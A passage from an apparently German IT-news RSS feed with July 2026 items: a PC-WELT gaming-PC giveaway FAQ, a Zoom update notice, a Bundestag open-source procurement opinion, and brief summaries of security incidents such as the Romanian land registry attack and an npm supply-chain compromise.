</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RinseV/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RinseV">@RinseV</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4597635124" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15231" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15231/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15231">#15231</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/dependabot/dependabot-core/compare/v0.386.0...v0.387.0"><tt>v0.386.0...v0.387.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HMX 6 FAQ: Die wichtigsten Fragen und Antworten zur neuen Höllenmaschine 2026 geklärt]]></title>
<description><![CDATA[HMX 6
					Alle Infos zur HMX 6 und wie ihr sie gewinnen könnt
					Gesamtwert: über 40.000 Euro
				
				Erfahren Sie mehr
			
		
		


Mit der HMX 6 kehrt das bekannteste Hardware-Projekt von PC-WELT zurück. Doch was genau ist die sogenannte Höllenmaschine eigentlich, welches Thema verfolgt die ...]]></description>
<link>https://tsecurity.de/de/3673832/it-nachrichten/hmx-6-faq-die-wichtigsten-fragen-und-antworten-zur-neuen-hoellenmaschine-2026-geklaert/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673832/it-nachrichten/hmx-6-faq-die-wichtigsten-fragen-und-antworten-zur-neuen-hoellenmaschine-2026-geklaert/</guid>
<pubDate>Thu, 16 Jul 2026 16:47:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



		<div class="promo_wrap promo_wrap_sticky">
			<div class="row_wrapper">
				<div class="column_wrapper">
					<p class="eyebrow">HMX 6</p>
					<p class="promo-title"><strong>Alle Infos zur HMX 6 und wie ihr sie gewinnen könnt</strong></p>
					<p class="promo-description">Gesamtwert: über 40.000 Euro</p>
				</div>
				<div class="more_btn"><a href="https://www.pcwelt.de/hmx" target="_blank" class="sticky-promotion-view-deal-link" data-vars-link-position="Floating Conversion Unit">Erfahren Sie mehr</a></div>
			</div>
		</div>
		


<p>Mit der HMX 6 kehrt das bekannteste Hardware-Projekt von PC-WELT zurück. Doch was genau ist die sogenannte Höllenmaschine eigentlich, welches Thema verfolgt die diesjährige Generation und wie kann man am Gewinnspiel teilnehmen?</p>



<p>In diesem FAQ beantworten wir die wichtigsten Fragen rund um das Projekt, die Videoserie, die verbaute Hardware und den Gesamtwert der HMX 6. Der Artikel wird im Verlauf des Projekts regelmäßig aktualisiert, sobald neue Details feststehen.</p>



<div class="wp-block-idg-base-theme-faq-block faq-block"><h2 class="faq-block-title"> FAQ </h2><hr class="block-horizotal-divider">
<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">1.</span>
<h3 class="wp-block-heading">Was ist die Höllenmaschine?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Die Höllenmaschine ist eines der bekanntesten und aufwendigsten Hardware-Projekte von PC‑WELT. Sie ist ein außergewöhnlicher Gaming-PC, den es so kein zweites Mal auf der Welt gibt. Dabei gilt das Motto „Das Beste ist gerade gut genug”!</p>



<p>Die Höllenmaschine besticht durch ein einzigartiges Design, die neuesten, schnellsten und teuersten Komponenten, die es auf dem Markt gibt, und das anschließende Gewinnspiel – denn wir verlosen dieses Einzelstück an einen glücklichen Gewinner aus der Community.</p>



<p>Den kompletten Entstehungsprozess begleiten wir redaktionell. Von der ersten Idee über die Planung und den Bau bis hin zu Problemen, Rückschlägen und der finalen Enthüllung können Zuschauer verfolgen, wie eine neue Höllenmaschine entsteht.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">2.</span>
<h3 class="wp-block-heading">Seit wann gibt es das Höllenmaschinen-Projekt?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Die Geschichte der Höllenmaschine begann vor 20 Jahren im Jahr 2006, als unser <a href="https://www.pcwelt.de/author/michael_schmelzle" target="_blank" rel="noreferrer noopener">PC-WELT-Redakteur Michael Schmelzle</a> die <a href="https://www.pcwelt.de/article/3139027/vor-20-jahren-die-erste-hoellenmaschine-der-pc-welt-2006.html" target="_blank" rel="noreferrer noopener">erste Höllenmaschine zum Leben erweckte</a>. Seitdem sind mehrere außergewöhnliche High-End-PCs entstanden, die für ihre Zeit besonders leistungsstark, aufwendig konstruiert und teilweise ausgesprochen experimentell waren.</p>



<p>Teilweise haben wir 5 Gaming-Systeme, darunter eine Playstation 5 und eine Xbox Series X, in einem einzigen PC-Gehäuse untergebracht oder unfassbar große Spiele- und Zubehörpakete zum eigentlichen Gaming-PC hinzugepackt. Daraus ergaben sich dann natürlich auch enorm hohe Gewinnspielwerte.</p>



<p>Das <strong>20-jährige Jubiläum feiern wir dieses Jahr mit der HMX 6</strong>, bei der wir etwas bauen, was wir immer schon wollten, bisher aber noch nie umgesetzt hatten!</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">3.</span>
<h3 class="wp-block-heading">Was ist die HMX 6?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Anders als ein klassischer Gaming-PC wird die HMX 6 als aufwendig konstruierter Tisch-PC umgesetzt. Die Hardware befindet sich also nicht einfach in einem gewöhnlichen Gehäuse, sondern wird Teil eines speziell entwickelten Schreibtischs mit zahlreichen technischen und optischen Besonderheiten.</p>



<p>Mehr können wir zum aktuellen Zeitpunkt noch nicht verraten. Sobald wir mehr Details enthüllen dürfen, finden Sie die Informationen auch in diesem FAQ.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">4.</span>
<h3 class="wp-block-heading">Wofür steht die Abkürzung HMX?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>HMX steht für HöllenMaschine eXtreme. Nach der HM08 (im Jahr 2018) und der HM UVR (9. Generation der Höllenmaschine) musste eine Namensänderung her, die der Extremität der Höllenmaschine gerecht wird. Und so wurde aus Höllenmaschine eXtreme die kurze und griffige Bezeichnung “HMX”.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">5.</span>
<h3 class="wp-block-heading">Wer steckt hinter der Höllenmaschine?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Die Höllenmaschine ist ein Projekt von PC-WELT, das vom Redakteur Michael Schmelzle vor über 20 Jahren entwickelt wurde. Und er begleitet auch heute noch sein Baby mit voller Leidenschaft und ist die Konstante im “Team Hölle”, das heute aus ihm und unserem Video-Host Kris Wallburg (seit 2025) besteht. Zu sehen ist das Duo auf unserem PC-WELT-Youtube-Kanal, auf dem die beiden das Höllenmaschienen-Projekt betreuen und umsetzen.</p>



<p>Weil das Projekt aber immer größer wurde, sind mittlerweile noch mehr Leute in dem Projekt involviert. Neben Team Hölle sind das vor allem Christian Seliger, Daniel Geßner, Daniel Behrens, Jérémie Kaiser, Panagiotis Kolokythas, Bastian Wehner, Saskia van der Kraaij und ich, Dennis Steimels.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">6.</span>
<h3 class="wp-block-heading">Welche Hardware steckt in der diesjährigen HMX 6?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Die HMX 6 wird mit aktueller High-End-Hardware ausgestattet sein und mehr als genug Leistung für anspruchsvolles Gaming, hohe Auflösungen und moderne Spiele bieten.</p>



<p>Welche Komponenten konkret verbaut werden, verraten wir nach und nach. Einen kleinen Spoiler bekommt ihr, wenn ihr <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">unsere HMX-Seite besucht</a>, da wir hier schon die eine oder andere Hardware vorgestellt haben, die Teil der HMX 6 wird.</p>



<p>Neben den klassischen PC-Komponenten wie Prozessor, Grafikkarte, Arbeitsspeicher, SSDs, Mainboard, Netzteil und Wasserkühlung wird es auch ein umfangreiches Peripherie-Paket geben.</p>



<p>So bleibt die Hardware zunächst noch ein Teil des Geheimnisses – schließlich soll nicht schon vor der Veröffentlichung aller Folgen auf YouTube jedes Detail der HMX 6 bekannt sein.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">7.</span>
<h3 class="wp-block-heading">Wann startet die HMX-6-Videoserie und wie oft kommen neue Folgen?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Die HMX-6-Videoserie startet mit einer Folge über die Geschichte der Höllenmaschine und blickt auf die vergangenen 20 Jahre des Projekts zurück. <strong>Voraussichtlicher Start ist der 21. Juli 2026.</strong> Der <a href="https://www.pcwelt.de/article/3179968/hmx-6-trailer.html" target="_blank" rel="noreferrer noopener">Trailer zur HMX 6 ging bereits am 30. Juni 2026 online</a>.</p>



<p>Anschließend begleiten neue Episoden die Planung, die Entwicklung und den Bau der HMX 6. Dabei werden unter anderem das Konzept, die Konstruktion des Tischs, die Hardware, das Design und die größten Herausforderungen thematisiert.</p>



<p>Neue Folgen erscheinen regelmäßig einmal pro Woche auf dem YouTube-Kanal von PC-WELT. Ergänzend gibt es auf <a href="https://www.youtube.com/playlist?list=PLVC_WMwVwvSiOOgt6D9mN4Ud71M_uLFsS">YouTube Shorts</a>, <a href="https://www.instagram.com/pcwelt/">Instagram</a>, <a href="https://www.tiktok.com/@pcwelt.de">TikTok</a>, <a href="https://www.facebook.com/pcwelt/reels/">Facebook </a>und natürlich auf <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">pcwelt.de</a> weitere Einblicke, kurze Updates und Szenen hinter den Kulissen.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">8.</span>
<h3 class="wp-block-heading">Wie kann ich am HMX-6-Gewinnspiel teilnehmen und wie lange läuft es?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Die Teilnahme erfolgt über <a href="https://www.pcwelt.de/article/3179491/hmx-6-gewinnspiel.html" target="_blank" rel="noreferrer noopener">unseren Gewinnspiel-Artikel zur HMX 6</a>. Dort können sich Interessierte registrieren und die jeweils angegebenen Teilnahmebedingungen erfüllen. Durch verschiedene Aktivitäten können Sie Ihre Gewinnchance erhöhen, etwa indem Sie uns auf Instagram und YouTube besuchen und unseren Newsletter abonnieren</p>



<p>Das Gewinnspiel läuft bis zum <strong>30. September 2026</strong>. Eine Teilnahme ist kostenlos. Alle Details zu Teilnahmeberechtigung, Datenschutz, Aktionszeitraum und möglichen Zusatzaktionen stehen in den offiziellen Teilnahmebedingungen.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">9.</span>
<h3 class="wp-block-heading">Wie und wann werden die Gewinner benachrichtigt?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Die Gewinner werden zeitnah nach Ende des Gewinnspiels per Zufall ermittelt und über die bei der Teilnahme angegebenen Kontaktdaten per E-Mail benachrichtigt.</p>



<p>Die Kontaktaufnahme erfolgt ausschließlich über die offiziellen Kanäle von PC-WELT.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">10.</span>
<h3 class="wp-block-heading">Wie hoch ist der Gesamtwert der HMX 6?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Die HMX 6 besteht nicht nur aus leistungsstarker High-End-Hardware. Auch die speziell entwickelte Tischkonstruktion, individuell angefertigte Bauteile, Custom-Kühlung, Beleuchtung und zahlreiche Sonderanfertigungen fließen in den Gesamtwert ein.</p>



<p>Dadurch liegt der Wert deutlich über dem eines gewöhnlichen Gaming-PCs. Stand jetzt liegen wir definitiv bei über 40.000 Euro und sind auf dem Weg, die teuerste Höllenmaschine jemals zu bauen. Den bisherigen Höchstwert von 43.000 Euro haben wir 2017 mit der <a href="https://www.pcwelt.de/article/1163701/community-gewinnspiel-gaming-spiele-pc-hoellenmaschine-8.html" target="_blank" rel="noreferrer noopener">Höllenmaschine 8</a> aufgestellt.</p>
</div>
</div></div>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gravierende Sicherheitslücken: Zoom-Usern droht Konto-Klau - dringendes Update]]></title>
<description><![CDATA[Wer jetzt unter Windows sein Zoom nicht aktualisiert, riskiert ungebetene Besucher im Konto. Warum das Update so wichtig ist und wie Sie mit wenigen Klicks wieder auf der sicheren Seite sind. 16.07.2026 - 11:00 Uhr Quelle: dpa.]]></description>
<link>https://tsecurity.de/de/3673595/it-nachrichten/gravierende-sicherheitsluecken-zoom-usern-droht-konto-klau-dringendes-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673595/it-nachrichten/gravierende-sicherheitsluecken-zoom-usern-droht-konto-klau-dringendes-update/</guid>
<pubDate>Thu, 16 Jul 2026 15:17:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wer jetzt unter Windows sein Zoom nicht aktualisiert, riskiert ungebetene Besucher im Konto. Warum das Update so wichtig ist und wie Sie mit wenigen Klicks wieder auf der sicheren Seite sind. 16.07.2026 - 11:00 Uhr Quelle: dpa.]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram t.me links disrupted over sanctioned VPN]]></title>
<description><![CDATA[Telegram’s widely used t.me shortlinks experienced a complete outage lasting roughly one day after the .ME domain registry suspended the domain in response to US sanctions targeting a VPN service popular with cybercriminals. This article has been indexed from CyberMaterial…
Read more →
The post T...]]></description>
<link>https://tsecurity.de/de/3673550/it-security-nachrichten/telegram-tme-links-disrupted-over-sanctioned-vpn/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673550/it-security-nachrichten/telegram-tme-links-disrupted-over-sanctioned-vpn/</guid>
<pubDate>Thu, 16 Jul 2026 15:09:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Telegram’s widely used t.me shortlinks experienced a complete outage lasting roughly one day after the .ME domain registry suspended the domain in response to US sanctions targeting a VPN service popular with cybercriminals. This article has been indexed from CyberMaterial…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/telegram-t-me-links-disrupted-over-sanctioned-vpn/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/telegram-t-me-links-disrupted-over-sanctioned-vpn/">Telegram t.me links disrupted over sanctioned VPN</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bundestags-Gutachten: Open-Source-First ist geboten]]></title>
<description><![CDATA[Ein Gutachten der Wissenschaftlichen Dienste des Bundestages schafft Klarheit in Bezug auf den Open-Source-Einsatz in der Öffentlichen Hand.
Deutscher Bundestag/Werner Schüring



In deutschen Amtsstuben herrschte lange Zeit eine lähmende Verunsicherung: Darf eine Behörde in ihrer Ausschreibung e...]]></description>
<link>https://tsecurity.de/de/3673502/it-security-nachrichten/bundestags-gutachten-open-source-first-ist-geboten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673502/it-security-nachrichten/bundestags-gutachten-open-source-first-ist-geboten/</guid>
<pubDate>Thu, 16 Jul 2026 14:53:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bundestag.jpg?quality=50&amp;strip=all&amp;w=1024" alt="government" class="wp-image-4197839" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Ein Gutachten der Wissenschaftlichen Dienste des Bundestages schafft Klarheit in Bezug auf den Open-Source-Einsatz in der Öffentlichen Hand.</p>
</figcaption></figure><p class="imageCredit">Deutscher Bundestag/Werner Schüring</p></div>



<p class="wp-block-paragraph">In deutschen Amtsstuben herrschte lange Zeit eine lähmende Verunsicherung: Darf eine Behörde in ihrer Ausschreibung explizit Open-Source-Software (OSS) fordern? Oder verstößt sie damit gegen das Neutralitätsgebot des Vergaberechts? Hierzu gibt es nun ein Gutachten der <a href="https://www.bundestag.de/parlament/verwaltung/ua_wd">Wissenschaftlichen Dienste des Bundestages</a> mit dem sperrigen Titel „<a href="https://www.bundestag.de/resource/blob/1165534/WD-7-010-26.pdf?utm_source=Bundestags-Gutachten...+%28Massenmailing+erstellt+am+2026-06-16%29&amp;utm_medium=Email">Vergabeverfahren zur Bereitstellung, Entwicklung und Änderung von Computersoftware – Zur Zulässigkeit der Beschränkung eines öffentlichen Auftragsgegenstandes auf „Open Source Softwar</a>e““.</p>



<p class="wp-block-paragraph">Das Papier schafft nun Klarheit. Das Ergebnis: Die gezielte Vorgabe von Open Source ist rechtlich zulässig und aus strategischen sowie wirtschaftlichen Gründen oft der sinnvollste Weg. Bisher hielt sich in vielen Behörden hartnäckig das Gerücht, Open-Source-Vorgaben würden Wettbewerber ausschließen.</p>



<h2 class="wp-block-heading">Schluss mit alten Mythen</h2>



<p class="wp-block-paragraph">Eine Meinung, die <a href="https://de.linkedin.com/in/pganten">Peter Ganten</a>, Vorstandsvorsitzender der Open Source Business Alliance (<a href="https://osb-alliance.de/">OSBA</a>), schon immer ein Dorn im Auge war. Im Kontext des Gutachtens betont er, dass Open Source keine spezifische Technologie sei, die nur von einer Firma angeboten werde, sondern eine Lizenzierungsart.</p>



<p class="wp-block-paragraph">So erklärt Ganten: „Jeder Anbieter kann Open Source Software anbieten“. Dieser Weg schaffe Transparenz und Resilienz für die öffentliche Hand. Das Gutachten bestätigt dies: Eine Entscheidung für OSS ist vergaberechtlich gedeckt. Allerdings muss sie sachlich gerechtfertigt, verhältnismäßig und transparent begründet sein. Um rechtlich auf der sicheren Seite zu stehen, sollten Ausschreibungen lediglich den Zusatz „oder gleichwertig“ enthalten, falls für einen spezifischen Bereich tatsächlich keine quelloffene Lösung existiert.</p>



<h2 class="wp-block-heading">Digitale Souveränität als Muss</h2>



<p class="wp-block-paragraph">Das Gutachten geht jedoch über ein bloßes „Es ist erlaubt“ hinaus. So führt es aus, dass eine Entscheidung für Open Source aufgrund von strategischen und auftragsbezogenen Gründen sogar geboten sein kann. Hier stehen zentrale Aspekte der <a href="https://www.computerwoche.de/article/4024965/digitale-souveranitat-es-ist-hochste-zeit-etwas-zu-verandern.html?utm=hybrid_search">digitalen Souveränität</a> im Fokus:</p>



<ul class="wp-block-list">
<li><strong>IT-Sicherheit:</strong></li>
</ul>



<p class="wp-block-paragraph">Quelloffene Software ermögliche eine tiefgreifende Prüfung des Codes.</p>



<ul class="wp-block-list">
<li><strong>Vermeidung von Lock-in-Effekten:</strong></li>
</ul>



<p class="wp-block-paragraph">Behörden sollten sich nicht länger in die Abhängigkeit von einzelnen Software-Giganten begeben.</p>



<ul class="wp-block-list">
<li><strong>Interoperabilität:</strong></li>
</ul>



<p class="wp-block-paragraph">Die nahtlose Zusammenarbeit verschiedener Systeme werde durch offene Standards erleichtert.</p>



<p class="wp-block-paragraph">Auch das Argument der Sparsamkeit spricht laut Gutachten für diesen Weg. So könnten der OSBA zufolge wirtschaftliche Erwägungen eine bevorzugte Berücksichtigung von OSS rechtfertigen. Schließlich reduziere sie langfristige Kosten, Abhängigkeiten und Migrationsaufwände.</p>



<h2 class="wp-block-heading">Druck durch den EuGH</h2>



<p class="wp-block-paragraph">Zusätzliche Brisanz erhält das Thema noch dadurch, dass sich das Gutachten, , auf die Rechtsprechung des Europäischen Gerichtshofes (EuGH) stützt, so ein Hinweis des Open-Source-Verbands. In einem bislang in der Öffentlichkeit kaum bekannten <a href="https://eur-lex.europa.eu/legal-content/DE/TXT/HTML/?uri=CELEX:62023CJ0578">Urteil vom Januar 2025</a> kommt der EuGH zu dem Schluss: Behörden dürfen selbst verschuldete Vendor-Lock-ins nicht länger als Ausrede nutzen, um Aufträge ohne Wettbewerb direkt an ihre bisherigen IT-Partner zu vergeben.</p>



<p class="wp-block-paragraph">Vielmehr seien die Verwaltungen nun in der Pflicht, durch aktives Marktmonitoring diese Abhängigkeiten abzubauen. Das Gutachten des Bundestages setzt hier nach Meinung der OSBA einen klaren Impuls: Wer bereits bei der Erstvergabe auf Open Source setzt, verhindert von vornherein das Entstehen kostspieliger Ausschließlichkeitssituationen.</p>



<p class="wp-block-paragraph">Letztlich markiert das Gutachten einen Wendepunkt. Da die genannten Gründe für Open Source – von Sicherheit bis Kosteneffizienz – in fast jedem Beschaffungsverfahren eine Rolle spielen, ist nach Ansicht der Interessenvertretung die Vorgabe von quelloffener Software ab sofort „so gut wie immer möglich“. Es bleibt abzuwarten, wie schnell die Behörden diesen neuen Spielraum nutzen werden, um die digitale Fessel proprietärer Anbieter abzustreifen. Erste Bundesländer wie <a href="https://www.computerwoche.de/article/2833398/schleswig-holstein-verabschiedet-sich-von-microsoft.html">Schleswig-Holstein</a> haben die digitale Wende bereits vollzogen.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Romania’s land registry hit by cyber attack, data allegedly for sale]]></title>
<description><![CDATA[Romania’s National Agency for Cadastre and Land Registration (ANCPI) suffered a major disruption on Tuesday, July 14, when its e-Terra cadastre and land registry app became unavailable to users. What was first declared to be a “major technical incident” has now been confirmed as a cyber attack. W...]]></description>
<link>https://tsecurity.de/de/3673151/it-security-nachrichten/romanias-land-registry-hit-by-cyber-attack-data-allegedly-for-sale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673151/it-security-nachrichten/romanias-land-registry-hit-by-cyber-attack-data-allegedly-for-sale/</guid>
<pubDate>Thu, 16 Jul 2026 12:54:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Romania’s National Agency for Cadastre and Land Registration (ANCPI) suffered a major disruption on Tuesday, July 14, when its e-Terra cadastre and land registry app became unavailable to users. What was first declared to be a “major technical incident” has now been confirmed as a cyber attack. While the circumstances are still being investigated by the competent state institutions, ANCPI stated that the data administered through its IT systems has not been compromised as a … <a href="https://www.helpnetsecurity.com/2026/07/16/romania-ancpi-cyber-attack/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/16/romania-ancpi-cyber-attack/">Romania’s land registry hit by cyber attack, data allegedly for sale</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Romania’s land registry hit by cyber attack, data allegedly for sale]]></title>
<description><![CDATA[Romania’s National Agency for Cadastre and Land Registration (ANCPI) suffered a major disruption on Tuesday, July 14, when its e-Terra cadastre and land registry app became unavailable to users. What was first declared to be a “major technical incident” has…
Read more →
The post Romania’s land re...]]></description>
<link>https://tsecurity.de/de/3673107/it-security-nachrichten/romanias-land-registry-hit-by-cyber-attack-data-allegedly-for-sale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673107/it-security-nachrichten/romanias-land-registry-hit-by-cyber-attack-data-allegedly-for-sale/</guid>
<pubDate>Thu, 16 Jul 2026 12:36:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Romania’s National Agency for Cadastre and Land Registration (ANCPI) suffered a major disruption on Tuesday, July 14, when its e-Terra cadastre and land registry app became unavailable to users. What was first declared to be a “major technical incident” has…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/romanias-land-registry-hit-by-cyber-attack-data-allegedly-for-sale/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/romanias-land-registry-hit-by-cyber-attack-data-allegedly-for-sale/">Romania’s land registry hit by cyber attack, data allegedly for sale</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft makes Windows SSO prompts easier to manage]]></title>
<description><![CDATA[Microsoft is introducing a new registry-based policy that lets IT administrators automatically accept Windows SSO permissions on Windows 11 versions 24H2 and 25H2 devices managed with Microsoft Entra ID. Users with personal Microsoft accounts and devices outside policy-managed environments will…
...]]></description>
<link>https://tsecurity.de/de/3672936/it-security-nachrichten/microsoft-makes-windows-sso-prompts-easier-to-manage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672936/it-security-nachrichten/microsoft-makes-windows-sso-prompts-easier-to-manage/</guid>
<pubDate>Thu, 16 Jul 2026 11:23:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft is introducing a new registry-based policy that lets IT administrators automatically accept Windows SSO permissions on Windows 11 versions 24H2 and 25H2 devices managed with Microsoft Entra ID. Users with personal Microsoft accounts and devices outside policy-managed environments will…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/microsoft-makes-windows-sso-prompts-easier-to-manage/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/microsoft-makes-windows-sso-prompts-easier-to-manage/">Microsoft makes Windows SSO prompts easier to manage</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft makes Windows SSO prompts easier to manage]]></title>
<description><![CDATA[Microsoft is introducing a new registry-based policy that lets IT administrators automatically accept Windows SSO permissions on Windows 11 versions 24H2 and 25H2 devices managed with Microsoft Entra ID. Users with personal Microsoft accounts and devices outside policy-managed environments will c...]]></description>
<link>https://tsecurity.de/de/3672853/it-security-nachrichten/microsoft-makes-windows-sso-prompts-easier-to-manage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672853/it-security-nachrichten/microsoft-makes-windows-sso-prompts-easier-to-manage/</guid>
<pubDate>Thu, 16 Jul 2026 10:52:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft is introducing a new registry-based policy that lets IT administrators automatically accept Windows SSO permissions on Windows 11 versions 24H2 and 25H2 devices managed with Microsoft Entra ID. Users with personal Microsoft accounts and devices outside policy-managed environments will continue to receive SSO permission prompts. Admin control for SSO prompts in Windows (Source: Microsoft) Why Microsoft introduced it In the European Economic Area (EEA), Microsoft changed the Windows sign-in experience so users can choose … <a href="https://www.helpnetsecurity.com/2026/07/16/windows-sso-policy-admin-control/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/16/windows-sso-policy-admin-control/">Microsoft makes Windows SSO prompts easier to manage</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Neues Ugreen-USB-C-Kabel zeigt per Display die Ladegeschwindigkeit an]]></title>
<description><![CDATA[Die Marke Ugreen hat ein neues Kabel im Sortiment, das über ein integriertes Display verschiedene Leistungsdaten anzeigt. Wer also an Ladegeschwindigkeit, Spannung und Stromstärke interessiert ist, muss nicht mehr zusätzliche Messgeräte einsetzen, sondern bekommt die Werte direkt am Display-Kabel...]]></description>
<link>https://tsecurity.de/de/3672638/ios-mac-os/neues-ugreen-usb-c-kabel-zeigt-per-display-die-ladegeschwindigkeit-an/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672638/ios-mac-os/neues-ugreen-usb-c-kabel-zeigt-per-display-die-ladegeschwindigkeit-an/</guid>
<pubDate>Thu, 16 Jul 2026 09:25:54 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Die Marke Ugreen hat ein neues Kabel im Sortiment, das über ein integriertes Display verschiedene Leistungsdaten anzeigt. Wer also an Ladegeschwindigkeit, Spannung und Stromstärke interessiert ist, muss nicht mehr zusätzliche Messgeräte einsetzen, sondern bekommt die Werte direkt am Display-Kabel angezeigt. Daraus resultiert auf einer Seite ein deutlich größerer Stecker, denn das Display zeigt übersichtlich Watt, […]</p>
<p>Der Beitrag <a href="https://www.appgefahren.de/neues-ugreen-usb-c-kabel-zeigt-per-display-die-ladegeschwindigkeit-an-402400.html">Neues Ugreen-USB-C-Kabel zeigt per Display die Ladegeschwindigkeit an</a> erschien zuerst auf <a href="https://www.appgefahren.de/">appgefahren.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[NPM ecosystem hit with two new supply chain compromises]]></title>
<description><![CDATA[Attacks targeting developer ecosystems are increasing in frequency and sophistication, with Node.js developers firmly in this week’s crosshairs, as multiple npm packages belonging to the open-source AsyncAPI and Jscrambler Code Integrity were poisoned with malware following compromised developmen...]]></description>
